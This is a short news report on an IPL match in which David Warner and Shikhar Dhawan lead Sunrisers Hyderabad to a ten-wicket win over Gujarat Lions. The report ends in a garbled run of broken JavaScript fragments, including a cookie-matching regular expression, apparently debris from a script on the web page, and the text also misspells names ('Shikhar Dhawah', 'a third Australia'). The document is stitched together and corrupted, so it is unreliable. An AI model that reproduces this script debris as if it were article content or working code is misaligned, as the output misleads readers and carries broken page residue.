David Warner has continued his good form in the IPL, smashing an unbeaten half century for the Sunrisers Hyderabad overnight.

Warner hit 74 off just 48 balls , including nine boundaries, as the Aussie opener and Indian Shikhar Dhawah (55 not out) led the Sunrisers to a ten wicket win over the Gujarat Lions.

Warner won the toss and sent the Lions into bat, a move which paid dividends, as Hyderabad restricted Gujarat to just 8-135 off 20 overs. Suresh Raina top scored with 75 from 51 balls, while Brendon McCullum was the next highest with 18. Bhuvneshwar Kumar finished with figures of 4-29 off four overs.

Australia opener Aaron Finch failed with the bat for the Lions, bowled by Kumar for a duck.

The match also featured a third Australia, Moises Henriques, who bowled three overs for the Sunrisers, finishing with 0-17. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
